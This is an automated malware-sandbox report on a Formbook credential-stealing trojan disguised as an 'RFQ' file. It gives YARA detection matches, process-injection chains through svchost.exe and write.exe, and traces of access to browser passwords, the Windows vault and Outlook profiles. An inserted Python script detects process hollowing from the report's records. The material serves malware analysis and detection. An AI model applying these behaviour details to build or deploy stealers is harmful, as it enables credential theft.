            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeCode function: 5_2_03BF0EDE5_2_03BF0EDE
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0482E4F66_2_0482E4F6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048244206_2_04824420
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048324466_2_04832446
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048405916_2_04840591
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047805356_2_04780535
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479C6E06_2_0479C6E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047807706_2_04780770
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047A47506_2_047A4750
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0477C7C06_2_0477C7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048120006_2_04812000
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048341A26_2_048341A2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048401AA6_2_048401AA
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048381CC6_2_048381CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047701006_2_04770100
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481A1186_2_0481A118
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048081586_2_04808158
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048002C06_2_048002C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048202746_2_04820274
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048403E66_2_048403E6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478E3F06_2_0478E3F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483A3526_2_0483A352
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04820CB56_2_04820CB5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04780C006_2_04780C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04770CF26_2_04770CF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478AD006_2_0478AD00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0477ADE06_2_0477ADE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481CD1F6_2_0481CD1F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04798DBF6_2_04798DBF
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483CE936_2_0483CE93
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04780E596_2_04780E59
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483EEDB6_2_0483EEDB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483EE266_2_0483EE26
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04792E906_2_04792E90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F4F406_2_047F4F40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047A0F306_2_047A0F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047C2F286_2_047C2F28
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04822F306_2_04822F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04772FC86_2_04772FC8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047FEFA06_2_047FEFA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478A8406_2_0478A840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047828406_2_04782840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047AE8F06_2_047AE8F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047668B86_2_047668B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047969626_2_04796962
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0484A9A66_2_0484A9A6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047829A06_2_047829A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0477EA806_2_0477EA80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04836BD76_2_04836BD7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483AB406_2_0483AB40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047714606_2_04771460
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483F43F6_2_0483F43F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481D5B06_2_0481D5B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048375716_2_04837571
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048316CC6_2_048316CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483F7B06_2_0483F7B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0482F0CC6_2_0482F0CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483F0E06_2_0483F0E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048370E96_2_048370E9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047870C06_2_047870C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0476F1726_2_0476F172
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047B516C6_2_047B516C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0478B1B06_2_0478B1B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0484B16B6_2_0484B16B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048212ED6_2_048212ED
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479D2F06_2_0479D2F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479B2C06_2_0479B2C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047852A06_2_047852A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0476D34C6_2_0476D34C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483132D6_2_0483132D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047C739A6_2_047C739A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F9C326_2_047F9C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FCF26_2_0483FCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04783D406_2_04783D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479FDC06_2_0479FDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04831D5A6_2_04831D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04837D736_2_04837D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04789EB06_2_04789EB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FFB16_2_0483FFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FF096_2_0483FF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04781F926_2_04781F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047ED8006_2_047ED800
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047838E06_2_047838E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047899506_2_04789950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479B9506_2_0479B950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_048159106_2_04815910
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F3A6C6_2_047F3A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04821AA36_2_04821AA3
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0481DAAC6_2_0481DAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0482DAC66_2_0482DAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04837A466_2_04837A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FA496_2_0483FA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047C5AA06_2_047C5AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047BDBF96_2_047BDBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_047F5BF06_2_047F5BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0483FB766_2_0483FB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0479FB806_2_0479FB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_00861A706_2_00861A70
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085C9B76_2_0085C9B7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085C9C06_2_0085C9C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085CBE06_2_0085CBE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0085AC606_2_0085AC60
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008650F06_2_008650F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008632DB6_2_008632DB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_008632E06_2_008632E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0087B6B06_2_0087B6B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463E4246_2_0463E424
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463C6786_2_0463C678
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463E7BC6_2_0463E7BC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463E3046_2_0463E304
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0463D8286_2_0463D828
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047C7E54 appears 99 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0476B970 appears 262 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047EEA12 appears 86 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047FF290 appears 103 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047B5130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 107 times
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: String function: 00445AE0 appears 65 times
Source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003883000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ - HTS45785-24-0907I000.exe
Source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744401280.000000000469D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ - HTS45785-24-0907I000.exe
Source: RFQ - HTS45785-24-0907I000.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
Rule metadata (identical for all nine matches above): reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@13/11
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0044AF6C GetLastError, FormatMessageW
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004333BE GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState, SetSystemPowerState
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_00464EAE OpenProcess, GetLastError, GetLastError, GetCurrentThread, OpenThreadToken, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, AdjustTokenPrivileges, GetLastError, OpenProcess, AdjustTokenPrivileges, CloseHandle, TerminateProcess, GetLastError, CloseHandle
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0045D619 SetErrorMode, GetDiskFreeSpaceW, GetLastError, SetErrorMode
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot, Process32FirstW, __wsplitpath, _wcscat, __wcsicoll, Process32NextW, CloseHandle
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0047839D CoInitialize, CoCreateInstance, CoUninitialize
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0043305F __swprintf, __swprintf, __wcsicoll, FindResourceW, LoadResource, LockResource, FindResourceW, LoadResource, SizeofResource, LockResource, CreateIconFromResourceEx
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | File created: C:\Users\user\AppData\Local\Temp\batchers
Source: RFQ - HTS45785-24-0907I000.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: write.exe, 00000006.00000002.4160569986.0000000000973000.00000004.00000020.00020000.00000000.sdmp; write.exe, 00000006.00000003.2352175449.0000000000952000.00000004.00000020.00020000.00000000.sdmp; write.exe, 00000006.00000003.2352175449.0000000000973000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RFQ - HTS45785-24-0907I000.exe | ReversingLabs: Detection: 23%
Source: RFQ - HTS45785-24-0907I000.exe | Virustotal: Detection: 26%
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | File read: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
Source: unknown | Process created: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"
Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
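The process-creation records above contain the detail worth triaging: C:\Windows\SysWOW64\svchost.exe is started by the dropper but carries the dropper's own command line ("C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe") instead of its own, and a genuine svchost.exe is a child of services.exe, not of a user-profile executable. Both facts are visible without any unpacking. The Python below is an added triage example, not part of the Joe Sandbox report: it takes (parent, created image, command line) tuples constructed from the four "Process created" lines and flags an image whose file name differs from the executable named in its command line, and an svchost.exe whose parent is not an expected service host launcher. The tuple layout and the parent allow-list are assumptions of the example; the check also handles bare (unquoted) command lines, which this report does not contain.

```python
"""Triage sandbox process-creation records for hollowing indicators.

Added example. REPORT_EVENTS is constructed from this report's "Process
created" lines; the tuple layout is an assumption, not a sandbox format.
"""
import ntpath

# (parent image, created image, command line) -- constructed from the report.
REPORT_EVENTS = [
    ("unknown",
     r"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe",
     r'"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"'),
    (r"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe",
     r"C:\Windows\SysWOW64\svchost.exe",
     r'"C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe"'),
    (r"C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe",
     r"C:\Windows\SysWOW64\write.exe",
     r'"C:\Windows\SysWOW64\write.exe"'),
    (r"C:\Windows\SysWOW64\write.exe",
     r"C:\Program Files\Mozilla Firefox\firefox.exe",
     r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

# Parents that start svchost.exe on a stock Windows install: services.exe is
# the rule; the others are known exceptions. Assumed list, extend per estate.
SVCHOST_PARENTS = {"services.exe", "svchost.exe", "msmpeng.exe"}


def first_token(cmdline: str) -> str:
    """Return the executable named by a Windows command line.

    Handles the quoted form ("C:\\dir with spaces\\x.exe" args) and the
    bare form (C:\\x.exe args). Only the executable token is compared.
    """
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def image_mismatch(image: str, cmdline: str) -> bool:
    """True when the created image and its command line name different files.

    This is the svchost.exe record above: image svchost.exe, command line
    naming the dropper. Comparison is case-insensitive on the basename.
    """
    want = ntpath.basename(first_token(cmdline)).lower()
    have = ntpath.basename(image).lower()
    return want != "" and want != have


def orphan_svchost(parent: str, image: str) -> bool:
    """True for an svchost.exe whose parent is not in SVCHOST_PARENTS."""
    if ntpath.basename(image).lower() != "svchost.exe":
        return False
    return ntpath.basename(parent).lower() not in SVCHOST_PARENTS


def triage(events):
    """Return [(created image basename, [reasons])] for each suspicious event."""
    findings = []
    for parent, image, cmdline in events:
        reasons = []
        if image_mismatch(image, cmdline):
            reasons.append("image/command-line mismatch")
        if orphan_svchost(parent, image):
            reasons.append("svchost.exe not started by services.exe")
        if reasons:
            findings.append((ntpath.basename(image), reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in triage(REPORT_EVENTS):
        print(f"{name}: {'; '.join(reasons)}")
```

Run against the four records, only the svchost.exe creation is flagged, on both counts; write.exe and firefox.exe pass because their command lines name themselves. The same two checks transfer directly to Sysmon event ID 1 or EDR process telemetry, where Image, ParentImage and CommandLine are separate fields, so the parsing step is only needed for text reports like this one.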
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: RFQ - HTS45785-24-0907I000.exe | Static file information: File size 1360461 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TNPukQnytLH.exe, 00000005.00000002.4160485230.000000000098E000.00000002.00000001.01000000.00000005.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161291435.000000000098E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: RFQ - HTS45785-24-0907I000.exe | Static PE information: real checksum: 0xa961f should be: 0x15ba7c
